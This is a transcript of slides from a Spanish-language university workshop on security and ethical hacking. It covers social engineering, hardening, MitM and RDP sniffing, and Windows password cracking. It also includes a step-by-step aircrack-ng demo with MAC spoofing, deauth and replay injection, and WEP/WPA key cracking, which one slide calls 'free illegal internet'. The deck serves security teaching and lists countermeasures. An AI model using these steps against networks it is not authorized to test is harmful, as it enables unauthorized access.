Seguridad Informatica y Ethical Hacking

36
Universidad Tecnológica del Sur de Sonora eXpLoD Agosto 2010

description

Seguridad Informatica y Ethical Hacking

Transcript of Seguridad Informatica y Ethical Hacking

Universidad Tecnológica del Sur de Sonora

eXpLoDAgosto 2010

Agenda

Presentación

Disclaimer

Arsenal

Conceptos Básicos

Seguridad Informática

Ingeniería Social

Seguridad dentro y fuera del equipo (Tipos de Seguridad)

Software Reset Windows Password Tools (Hiren´s & UBCDW)

Copy/Paste Hack Attack All Windows Versions (Ubuntu CD)

OverView

Crack Windows Passwords Tools (OphCrack)

Contramedidas

Endurecimiento de políticas de seguridad (Hardening)

Herramientas de Intrusión: scanners, sniffers, IDS, etc.

Agenda

Ethical Hacking

Ataque Man-in-the-middle (MitM), conceptos

Remote Desktop Protocol (RDP), concepto y uso

Cain MitM RDP Windows Sniffing Password Attack

Contramedidas

Network Wireless, conceptos, usos y características

DEMO “Cracking Wireless Passwords“ con aircrack-ng

OverView

Contramedidas

Recursos

Preguntas y Respuestas

Conclusiones

Contacto

¿ Quién eres?, Quien Soy ?

¿ Qué sabes y que te gustaria aprender ?

¿ Por qué ?

Presentación

Disclaimer

Todos los contenidos expuestos, actividadesrealizadas y demostraciones de esta conferencia-taller son con fines 100% educativos, por lo cuallos expositores e institución educativa que losimparten se deslindan de cualquier responsabilidadque los participantes a dicho evento llegaran aadquirir por el mal uso o daño que pudieran causarcon la información o herramientas aquí expuestas.

Arsenal

Para la realización de esta conferencia tallerutilizaremos:

- Desktop PC- VirtualBox- Tarjeta de red inalámbrica soportada por aircrack- Router inalámbrico- Computadora portátil- Maquinas virtuales de Windows XP, 2003, Vista y 7- CDs de: Ubuntu 9.10, OphCrack, etc.- Software de propósito general

Conceptos Básicos

Hacker: Es una buena persona que hace cosasmalas :P

Red de computadoras: Montón de compus unidaspor cable para pasarse virus, bajar música ychatear.

Sistema Operativo: Programa que controla toda la compu (Windows, Linux, MacOS, Unix, etc.)

Sniffer: Olfateador de red (sabueso)

Virus: Invento del gobierno para distraer nuestra atención, H1N1

Conceptos Básicos

Firewall: Software o Hardware que protege lossistemas informáticos de intrusiones en la red

Puerto: Número de conexión dentro de unacomputadora para transferir información en la red

Cracker: “Criminal Hacker“

Escritorio Remoto: Aplicación para administrar a distancia una computadora (Ej. VNC y RDP)

Windows: Muy CrackHackeable :P (Aquí lo demostraremos, jejejeje )

Seguridad Informática¿Que es?

• Es simplemente el conjunto de métodos, formas y estándares que permiten asegurar que las políticas de una organización sean utilizadas de la manera en que fueron planeadas previniendo la alteración o modificación o reemplazo de los datos o directivas contenidas en nuestros recursos de información por personas o entidades no autorizadas.

¿Cómo nos afecta?

• Estamos rodeados de elementos de seguridad informática: PIN de tarjeta de débito y crédito, números de validación IMEI, tokens bancarios, contraseñas de servicios en línea, validadores de sistemas (como Captcha) todos estos son parte de nuestra vida diaria, sin una contraseña no podríamos accesar nuestra cuenta de correo, o retirar dinero de un cajero y si las perdemos o nos la roban suele ser laborioso (social y legal) el obtenerlos de regreso.

¿Todo es basado en cómputo?

• No, en realidad un recurso informático es todo aquel que resguarda información, una ficha bibliográfica, una muestra de ADN codificada, un pequeño papel con un código de acceso para una caja de seguridad mecánica, todo esto es información y es tomado en cuenta al momento de crear políticas, acuerdos y leyes sobre la informática.

¿Cómo lo aseguramos?

• Dependiendo del tipo de recurso, si es electrónico quizá sea necesario usar métodos de biométrica, si es algo mecánico, es probable que con un juego de llaves de seguridad o de candados rotatorios logremos nuestro objetivo, todo depende cuanto nos interesa proteger la información.

Ingeniería Social

¿Qué es?

• En el campo de la informática se denomina “Ingeniería social” al conjunto de métodos y prácticas usados para obtener información de usuarios legítimos y con la información obtenida lograr acceso a sistemas protegidos, siendo esta práctica de uso común entre piratas informáticos y delincuentes computacionales.

¿Cómo me afecta?

• Al no validar las referencias o no seguir el protocolo de seguridad adecuado para divulgar contraseñas o cualquier otra información sensible, podríamos ser cómplices de un crimen, México ha acordado con organismos internacionales la homologación y/o adecuación de códigos penales para que estos delitos sean perseguidos.

¿Cómo puedo saber si estoy siendo victima de un “ingeniero social”?

• Muy simple, cuando alguien nos pide algún tipo de información privilegiada y esta persona es insistente cuando le requerimos seguir un protocolo para validar su intención es altamente probable que estemos siendo victimas de un intento de robo de información por un ingeniero social/hacker.

¿Cómo puedo evitarlo?

•Sencillo, si no confiamos en la persona que nos pide cierta información (supongamos un técnico de soporte de nuestro lugar de trabajo) podemos pedirle que nos deje sus datos y comunicarnos con el/ella 10 minutos después de validar si la petición es legitima, es decir: solo sigamos los protocolos que existan para dar información, podemos crear los propios en casa y seguir los establecidos en la escuela u oficina.

Seguridad Dentro y Fuera

Debemos estar conscientes que ningún equipo o sistema es 100% seguro o fiable.

Establecer (y seguir) protocolos y procedimientos de seguridad para contraseñas, códigos, PINs, que nos permitan asegurar que cuando nos sean requeridos, quien nos lo pida sea alguien autorizado y con un motivo válido.

Adecuar estas políticas a nuestro propio equipo de cómputo y sistemas, portales y sitios que usamos con frecuencia (como longitud de contraseñas, uso de caracteres especiales y mayúsculas, etc.) y prevenir el uso de “cuentas compartidas” o “uso múltiple” pues eso eleva el riesgo de control y seguridad.

Ser precavidos, si algo no parece estar correcto es muy probable que no lo este.

Si estamos en la escuela u oficina y algo parece estar mal, reportarlo inmediatamente ya sea a nuestro jefe o profesor o al área encargada de sistemas.

Seguir los reglamentos (si no nos esta permitido accesar ciertos sitios, no lo hagamos).

Seguir nuestro instinto, muchas veces nosotros somos los mejores jueces para evaluar si algo esta bien o no.

Tipos de Seguridad:

Seguridad Física: Seguridad Física consiste en la "aplicación debarreras físicas y procedimientos de control, como medidas deprevención y contramedidas ante amenazas a los recursos einformación confidencial"(1). Se refiere a los controles y mecanismosde seguridad dentro y alrededor del Centro de Cómputo así como losmedios de acceso remoto al y desde el mismo; implementados paraproteger el hardware y medios de almacenamiento de datos.

Seguridad Lógica: La mayoría de los daños que puede sufrir uncentro de cómputos no será sobre los medios físicos sino contrainformación por él almacenada y procesada. La Seguridad Física, sóloes una parte del amplio espectro que se debe cubrir para no vivir conuna sensación ficticia de seguridad. Como ya se ha mencionado, elactivo más importante que se posee es la información, y por lo tantodeben existir técnicas, más allá de la seguridad física, que la aseguren.Estas técnicas las brinda la Seguridad Lógica.

Software Reset Windows

Password Tools (Hiren´s & UBCDW)

c:\windows\system32\config\sam

Copy/Paste Hack Attack All

Windows Versions (Ubuntu CD)

Copy/Paste ??¡¡¡ OverView

Crack Windows Passwords Tools

(OphCrack)

Woooow, is Cracking ¡¡¡¡ :x

Contramedidas

1- Seguridad Física del equipo2- Boot CD deshabilitado3- Password supervisor habilitado

4- Contraseñas robustas contra el password cracking

Hardening

¿Qué es?

• Un conjunto de métodos y directivas que permiten elevar el nivel de seguridad de un servidor computacional (principalmente) con el fin de denegar accesos no autorizados y evitar intrusiones y/o ataques computacionales, existen ciertos programas que nos ayudan a detectar fallos como “Bastille” de HP/Compaq que tuvo un éxito mas o menos amplio en sistemas con Solaris y posteriormente en sistemas GNU/Linux.

¿Cómo se logra?

• Las técnicas son amplias y van desde la eliminación de cuentas de acceso y validación mediante métodos alternativos (como LDAP) hasta la desinstalación, revisión y adecuación de servicios, archivos de configuración e instalación de centinelas de cambios en las maquinas a “endurecer”, existen incluso niveles que permiten comunicación solo de 1:1 (es decir una maquina solo va a “escuchar” a otra que fue validada y no más.

¿Quién lo hace?

• Principalmente, administradores de sistemas o consultores de seguridad computacional, la razón principal de esto es el conocimiento requerido en administración de sistemas e infraestructura para poder llevar a cabo un buen endurecimiento (con lo cual, una vez más, no podemos garantizar que sea 100% mas seguro, solo mas estable).

¿Qué sistema es el más inseguro?

• En realidad, existe un mantra que dice: “No hay sistema inseguro, solo un mal administrador” es decir, si adecuamos un equipo y elevamos el nivel de seguridad a lo técnicamente posible, es muy probable que los demás errores sean bugs del software mismo.

Herramientas de Intrusión: scanners, sniffers, IDS, etc.

• Denegación de servicio (PaP o distribuidas)

• Exploración de servicios y vulnerabilidades (PenTesting y Exploitation)

• Rompimiento de claves de autenticación (Auth Cracking)

• Capturadores de paquetes promiscuos (Sniffers, AirSniffers)

• Enumeradores de puertos y adivinadores de plataforma.

• Enmascaradores o “phishing posers” (servicios que parecen legítimos pero no lo son, enfocados al robo de información e identidad)

Existen una gran cantidad de

herramientas de este tipo entre las mas

comunes usadas en contra de servidores:

• Troyanos

• Gusanos

• Secuestradores y envenenadores de DNS

• Keyloggers

• Replicadores

Por el lado de los ataques a usuarios

existen las siguientes herramientas:

http://sectools.org/

Ethical Hacking

¿Qué es?

•La intrusión ética (o ethical hacking) es la aplicación de herramientas de intrusión, penetración, robo, personificación y negación de servicio llevado a cabo por “hackers éticos”, es decir, personas con la experiencia y conocimiento suficiente para llevar a cabo estas pruebas en nombre de la organización (es decir de manera legal y prevista) para determinar el nivel de seguridad de una red de equipos o servicios (incluido el aspecto de ingeniería social).

¿Por qué es importante?

•Al conocer el nivel de seguridad que se tiene en nuestra organización es mucho mas sencillo, que no simple, el tomar medidas que puedan subsanar estas deficiencias.

¿No es contraproducente?

•No, al usar las armas que el enemigo utiliza es mas factible que podamos determinar el nivel de riesgo, y por tanto la respuesta que debemos dar ante un ataque, es, viéndolo como analogía medica, como cuando nos vacunan, pues nos inoculan una “versión” del virus del cual nos quieren hacer inmunes.

¿Es fiable?

•Al contratar nosotros un servicio (o realizarlo de manera interna) estamos confiando en la ética profesional de quien evalúa por lo que si, siempre llevamos un riesgo, pero se establece un contrato de buena fe haciéndolo “suficientemente fiable”.

Ataque Man-in-the-middle (MitM), conceptos

En criptografía, un ataque man-in-the-middle (MitM ointermediario, en castellano) es un ataque en el queel enemigo adquiere la capacidad de leer, insertar ymodificar a voluntad, los mensajes entre dos partessin que ninguna de ellas conozca que el enlace entreellos ha sido violado. El atacante debe ser capaz deobservar e interceptar mensajes entre las dosvíctimas.

Ataque Man-in-the-middle (MitM), conceptos

El ataque MitM puede incluir algunos de los siguientes subataques:1. Intercepción de la comunicación (eavesdropping), incluyendo

análisis del tráfico y posiblemente un ataque a partir de textosplanos (plaintext) conocidos.

2. Ataques a partir de textos cifrados escogidos, en función de lo queel receptor haga con el mensaje descifrado.

3. Ataques de sustitución.4. Ataques de repetición.5. Ataque por denegación de servicio (denial of service).

Contramedidas

Claves públicasAutenticación mutua fuerteClaves secretas (secretos con alta entropía)Passwords (secretos con baja entropía)Otros criterios, como el reconocimiento de voz u otras característicasbiométricas

Remote Desktop Protocol (RDP), concepto y uso

Remote Desktop Protocol (RDP) es un protocolopropietario desarrollado por Microsoft que permite lacomunicación en la ejecución de una aplicación entreun terminal (mostrando la información procesada querecibe del servidor) y un servidor Windows(recibiendo la información dada por el usuario en elterminal mediante el ratón ó el teclado).

Cain MitM RDP Windows Sniffing

Password Attack y

Contramedidas

RDP OverView

Network Wireless, conceptos, usos y características

El término red inalámbrica (Wireless network) eninglés es un término que se utiliza en informática paradesignar la conexión de nodos sin necesidad de unaconexión física (cables), ésta se da por medio deondas electromagnéticas. La transmisión y larecepción se realizan a través de puertos.Una de sus principales ventajas es notable en loscostos, ya que se elimina todo el cable Ethernet yconexiones físicas entre nodos, pero también tieneuna desventaja considerable ya que para este tipo dered se debe de tener una seguridad mucho masexigente y robusta para evitar a los intrusos.

DEMO “Cracking Wireless

Passwords“ con aircrack-ng

OverView y

Contramedidas

Free Ilegal INternet

DEMO “Cracking Wireless Passwords“

Aircrack: http://www.aircrack-ng.org/

Aircrack Spanish: http://www.aircrack.es/

Compatibilidad de tarjetas inalámbricas con Linux: http://linux-wless.passys.nl/query_alles.php

DEMO “Cracking Wireless Passwords“

sudo apt-get install aircrack-ng

sudo apt-get install macchanger

sudo airmon-ng start wlan0

sudo ifconfig mon0 down

sudo macchanger -m 00:11:22:33:44:55 mon0

sudo ifconfig mon0 up

sudo airodump-ng mon0

DEMO “Cracking Wireless Passwords“

control + c

sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

PARA WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

PARA WEP

sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

DEMO “Cracking Wireless Passwords“

PARA WEP

sudo aircrack-ng -z [nombre red]*.cap

Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de losmismos, hasta que se nos muestre la clave de la red.

Contramedidas

Mac Address FilteringHide Wireless SSIDWPAAuthentication System

Aprende Viendo: http://aprendeviendo.org.mx

OphCrack: http://ophcrack.sourceforge.net/

UBCD for Windows: http://www.ubcd4win.com/

Top 100 Network Security Tools: http://sectools.org/

Cain & Abel: http://www.oxid.it/cain.html

Aircrack-ng: http://www.aircrack-ng.org/

Ubuntu: http://www.ubuntu.com/

Hiren´s Boot CD: http://www.hirensbootcd.net/

Process Monitor: http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx

Backtrak: http://www.backtrack-linux.org/

Recursos

Preguntas y Respuestas

Conclusiones

La seguridad computacional como un todo.

El elemento humano dentro de la seguridad computacional.

El establecimiento de reglas para un mejor nivel de seguridad.

Necesidad de profesionistas calificados para estos trabajos.

Gran amplitud de herramientas OpenSource.

Compromiso social y ético para sistemas.

Innovación diaria.

Contacto

Gracias ¡¡